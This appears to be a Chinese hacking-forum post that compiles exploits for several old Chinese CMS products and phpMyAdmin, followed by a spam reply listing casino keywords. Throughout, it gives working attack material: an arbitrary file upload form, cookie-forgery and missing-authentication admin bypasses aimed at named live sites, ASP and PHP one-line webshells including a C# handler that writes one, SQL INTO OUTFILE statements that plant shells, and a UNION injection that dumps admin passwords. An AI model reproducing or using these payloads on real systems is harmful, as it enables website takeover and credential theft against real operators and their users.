$ a% o* M+ ^; H! [+ Q# L3 i
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
8 c4 n6 ^1 F. b
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" z' W/ o) R; @7 j7 }$ I! l
( c% q. b7 ?8 o
YxShop易想购物商城4.7.1版本任意文件上传漏洞
! q0 C4 |" r# V
* M" [0 f* _5 o% w# r* U) T
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
8 n5 e2 u$ u' Q- ?: E/ p
跳转到网站根目录上传任意文件。
/ c0 p/ l0 x$ C+ K7 G; y: _
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
9 O3 A) N+ |3 o, [$ D8 ?5 i
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
9 m2 p X1 \: J+ d) e
Upload a new file:<br>
$ M$ j' X. S8 t% t) O9 L6 @
<input type="file" name="NewFile" size="50"><br>
4 p4 u. `) e N2 `7 T: o, J5 _
<input id="btnUpload" type="submit" value="Upload">
( |# {2 I, p( q% Z' }7 t
</form>
) d ~0 Y8 m; ]2 e3 i! P5 ~* s: p
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
i- L! I0 V D# y3 B
* j* p; w9 \! Z6 p4 z$ v* ?8 ]- n
SDcms 后台拿webshell
/ b* `! }! [% K
! V- U+ p, R4 D$ K' d9 L
第一种方法:
6 i6 s& q( U% y# i' L7 ]2 `: B
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
$ X0 t9 ^1 R/ E7 b9 Z6 R1 [
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
. a" P8 @/ k' Y$ |2 X- O2 f
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
' j! z+ l! H. V3 c6 L$ d
第二种方法:
$ `+ X+ c+ { b9 u6 c" b
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
* u) P" q! c' z. [( q
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
, d9 e- k$ v$ s3 l5 k' B* X# a
第三种方法:
( l% w+ C. a7 D3 d! q l3 o
进入后台-->界面管理-->模板文件管理-->创建文件
' m# U$ a) k4 `$ j* m- l
文件名写入getshell.ashx
) o; R6 o6 }" b( M4 `: g. ]9 a
内容写入下面内容:
& D! u. i3 O% L. t) J+ [
/====================复制下面的=========================/
. s$ I8 E2 u) t1 s
<%@ WebHandler Language="C#" Class="Handler" %>
" j( z& @4 ]/ ]. c% c" z4 B
using System;
0 Z4 [7 k) R8 w) ?$ o
using System.Web;
" i$ C7 L1 m# K: F: D
using System.IO;
1 e3 D# x) E% _: ?+ t/ Z( |$ R0 C$ H
public class Handler : IHttpHandler {
- i$ z6 f; j5 o4 h2 C* w- b/ Q
public void ProcessRequest (HttpContext context) {
& p4 F. G$ t- E. w
context.Response.ContentType = "text/plain";
- p! @* Y; \3 [. t9 v
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
. `2 f) i& d5 k8 e/ {
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
; X7 \8 j' I! R% _- F2 d" d
file1.Flush();
: ^, b1 @# x) l- I% G. y8 v
file1.Close();
7 k) C1 {+ |6 P8 m2 E) V
}
% k( X2 j/ j6 h1 Q2 _
public bool IsReusable {
! Z6 K2 r; d' m7 m0 m3 a, ?& H
get {
3 g+ S5 Q6 u s' u
return false;
; h3 z$ Y! B' b. e
}
1 F" @1 B: @; b% \
}
+ t; C5 D. N# u* S# d" u$ k
}
- D9 B' O! j8 l: @% d; i7 x
/=============================================/
" Z3 Y5 T+ [% X# L a6 F
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
5 d4 W: K9 v4 f
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
& K1 h. K' T6 d2 X/ s& r6 R7 J
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% x' |: C) l2 @3 b( R6 v
. A. o! c4 o8 l4 a
ESCMS网站管理系统0day
/ C4 X9 W8 [% k ]
! H' I) _5 t% o% S9 b! L9 r
后台登陆验证是通过admin/check.asp实现的
/ o; w: Y6 x7 M. [- m! M
- |3 E) Z% i9 Q" c) g
首先我们打开
http://target.com/admin/es_index.html
9 N8 \9 U% z1 m" f Y5 f" p
然后在COOKIE结尾加上
' t, R! J* k/ L
; ESCMS$_SP2=ES_admin=st0p;
A% m* f1 B" b2 i8 f
修改,然后刷新
, E. I8 Y7 ^' @& Y6 G. ~# m) \
进后台了嘎..
0 |6 u) l" s5 }- _
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
: _8 C* i/ V. T \0 [
) b' g( {2 ]# E4 D$ x' g
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
# ?- [1 p9 e, {+ d S3 q) Z, O
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
: x a/ a A% s6 d! b
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
& S) {2 Y5 r* X. [; y
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
) N; q" F- x) R5 Q/ U6 n, K( t
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, p# y$ H9 h+ D+ C5 D$ j
8 p" G; @8 y1 [5 d' D/ \- x
宁志网站管理系统后台无验证漏洞及修复
, R! o% n/ B9 s% T" y2 l: [( s
: x! k. z. F+ O0 T# F
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
5 e3 A& a. u2 H6 A; E/ m
官方网站:
www.ningzhi.net
' L! x( l7 ]$ Q' I; V. V' I
学校网站管理系统 V.2011版本
. p a" t6 |4 F" H1 g
http://down.chinaz.com/soft/29943.htm
9 u0 a, X1 q( g _- f
其它版本(如:政府版等),自行下载.
; W5 [* d+ e. V6 T/ k$ W, n
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
' `2 t6 L |+ \+ x
login.asp代码如下:
- H; Q- v& {4 \8 F8 a: h
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
7 }7 s+ j; L7 y8 I. j! s
manage.asp代码我就不帖出来了.反正也没验证.
$ Z/ l% r- a& L" ? v4 e
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
2 B' o( S Y7 J1 Z
漏洞利用:
( L8 ~$ ^ I% w5 p, u5 x
直接访问
http://www.0855.tv/admin/manage.asp
9 D* Y# o8 [ h( Y A# `& C3 K: O( q
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
* I7 d D( S+ r9 u: v( h
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ [) X3 F9 D3 y& ?/ A
5 ?3 w8 g; i1 g7 o- p
phpmyadmin拿shell的四种方法总结及修复
& B& C0 |- J6 ~/ J+ u
( H. u" i% b. r$ \8 Q0 v
方法一:
" A0 A, v: R# T
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
& ]( u' A D1 U5 {5 |
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
' _+ v" \6 {) q4 `- I
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
) {* q# O, D( T4 C0 Z
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
4 Q( ~5 c" {4 S2 ^- E: }
一句话连接密码:7on
2 ~* r; H: ~+ z' K' j2 t" q
方法二:
, C, O6 d' X0 c/ X" Y% Y X
读取文件内容: select load_file('E:/xamp/www/s.php');
- q5 |: p: X6 b
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
d& n0 J9 R) U: m$ \
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
* `9 i; b) p7 T0 ?% F A; H
方法三:
& A" ^6 L2 U9 L& |3 C
JhackJ版本 PHPmyadmin拿shell
, S, O8 r$ f& F9 C1 L \ E+ O1 `- r ?" K
Create TABLE study (cmd text NOT NULL);
( P. [0 n7 i5 ?0 [
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
) d4 @) f( ]( f% p
select cmd from study into outfile 'E:/wamp/www/7.php';
4 W2 z$ v1 N9 c4 \8 {# F" i" D& S
Drop TABLE IF EXISTS study;
; U6 [% \7 U" ~ M* T* Y$ h$ F* X
<?php eval($_POST[cmd])?>
% A- Y4 Q# w {! k$ o
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
) Q4 _8 r! O1 l- D+ Y$ G
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
9 s! _* ^8 e7 v4 c8 S e7 M
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
1 X3 ^6 }" A5 c1 V
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
j& x4 r3 _( f
方法四:
" j! O# g, E6 f2 e& D+ p
select load_file('E:/xamp/www/study.php');
! l! L1 w" j* {& k! {; d
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
, h1 \& q* _( a$ D
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
5 i3 B. C% ^) t9 i2 |$ {+ O* H% D
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 j: y. M' C9 l
" p- v; o1 b5 h/ T! B
NO.001中学网站管理系统 Build 110628 注入漏洞
2 Z" {) d6 ?6 A! |7 |& M
! K; \% g; e9 G
NO.001中学网站管理系统功能模块:
. R$ Q# A6 z( ^$ a Y9 T
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
8 H9 V9 E( t2 m) O' t! C& j+ |( [2 \* [/ L
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
* C G, I6 [0 y# o7 [( y
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
3 y5 L8 R; B0 d
4.视频图片管理:一级分类,动态添加视频或者图片等信息
* w5 T: \3 q" k1 Z, v
5.留言管理:对留言,修改,删除、回复等管理
1 N9 _7 i) W1 S N' Z
6.校友频道:包括校友资料excel导出、管理等功能
1 U( `( D; q, F0 X1 l" M2 h/ v
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
% V$ ~9 g/ k* X5 Y; d8 w, c
默认后台:admin/login.asp
7 }1 L- l& y9 B+ m* [ [
官方演示:
http://demo.001cms.net
/ V, a [; k- e. W4 _+ i
源码下载地址:
http://down.chinaz.com/soft/30187.htm
, k e g, y6 P( e( o- E
EXP:
6 [$ C! l6 p e0 ~
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
9 \5 d; T6 e+ ` d; l& Y
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
, A0 v* I2 h% w0 l: I8 t' v
getshell:后台有备份,你懂的
1 Y/ O! }: o0 @
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
$ O) q' X( X' s: m- H: K. E) V
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2